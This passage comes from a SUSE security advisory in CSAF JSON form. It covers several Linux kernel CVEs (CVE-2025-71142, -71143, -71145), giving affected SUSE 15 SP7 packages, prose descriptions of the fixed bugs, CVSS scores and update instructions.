"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-71142"
},
{
"cve": "CVE-2025-71143",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71143"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nclk: samsung: exynos-clkout: Assign .num before accessing .hws\n\nCommit f316cdff8d67 (\"clk: Annotate struct clk_hw_onecell_data with\n__counted_by\") annotated the hws member of \u0027struct clk_hw_onecell_data\u0027\nwith __counted_by, which informs the bounds sanitizer (UBSAN_BOUNDS)\nabout the number of elements in .hws[], so that it can warn when .hws[]\nis accessed out of bounds. As noted in that change, the __counted_by\nmember must be initialized with the number of elements before the first\narray access happens, otherwise there will be a warning from each access\nprior to the initialization because the number of elements is zero. This\noccurs in exynos_clkout_probe() due to .num being assigned after .hws[]\nhas been accessed:\n\n UBSAN: array-index-out-of-bounds in drivers/clk/samsung/clk-exynos-clkout.c:178:18\n index 0 is out of range for type \u0027clk_hw *[*]\u0027\n\nMove the .num initialization to before the first access of .hws[],\nclearing up the warning.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71143",
"url": "https://www.suse.com/security/cve/CVE-2025-71143"
},
{
"category": "external",
"summary": "SUSE Bug 1256749 for CVE-2025-71143",
"url": "https://bugzilla.suse.com/1256749"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-71143"
},
{
"cve": "CVE-2025-71145",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71145"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: phy: isp1301: fix non-OF device reference imbalance\n\nA recent change fixing a device reference leak in a UDC driver\nintroduced a potential use-after-free in the non-OF case as the\nisp1301_get_client() helper only increases the reference count for the\nreturned I2C device in the OF case.\n\nIncrement the reference count also for non-OF so that the caller can\ndecrement it unconditionally.\n\nNote that this is inherently racy just as using the returned I2C device\nis since nothing is preventing the PHY driver from being unbound while\nin use.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
